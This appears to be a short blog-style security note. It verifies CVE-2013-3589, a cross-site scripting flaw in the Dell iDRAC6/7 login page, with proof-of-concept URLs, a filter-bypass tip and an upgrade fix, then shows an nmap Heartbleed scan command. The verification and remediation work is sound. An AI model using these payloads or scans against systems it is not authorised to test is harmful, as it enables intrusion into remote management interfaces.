How to verify CVE-2013-3589 (Dell iDRAC 6 and iDRAC 7 XSS Vulnerability)

1.   Nessus description:

The remote Dell Remote Access Controller (iDRAC6 / iDRAC7) is affected by a cross-site scripting vulnerability. The login page does not properly sanitize user-supplied input to the 'ErrorMsg' parameter. An attacker could leverage this to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site.

2.   Demonstration:

1) Actually the login page does filter some Java scripts, so if you use the common script like <script>alert(1)</script>, it won’t work.
2) Example 1: pop up a javascript window.
https://192.168.xxx.xxx/login.html?ErrorMsg=%3Cimg%20src=asdf%20onerror=alert%28%22XSS%22%29%3E





3) Example 2: redirect to https://google.com

https://192.168.xxx.xxx/login.html?ErrorMsg="><img src=x onerror=window.open('https://google.com/');>

3.   Recommendation

1) Upgrade to firmware version 1.96 (iDRAC6) / 1.46.45 (iDRAC7) or later.

4.   References:

1). http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3589
2). http://www.tenable.com/plugins/index.php?view=single&id=70411

Use NMAP to detect OPENSSL heartbleeding vulnerability

NMAP 6.46 (http://nmap.org/download.html) includes the openssl heartbleed script:

To use it, below is a sample command:

nmap -sV -v -p 0-65535 --script=ssl-heartbleed -iL ./hosts.txt -oX ./result.xml

Parameter description:

-sV: Probe open ports to determine service/version info

-v: Increase verbosity level

-iL : Input from list of hosts/networks

-oX: output scan in XML format.

A sample output as below:

If for some reason, you cannot install nmap 6.46, you can manually download ssl-heartbleed.nse from http://nmap.org/nsedoc/scripts/ssl-heartbleed.html and put it in the NMAP scripts folder. You may need tls library to run the heartbleed script. Download it from http://nmap.org/nsedoc/lib/tls.html and put it in NMAP nselib folder.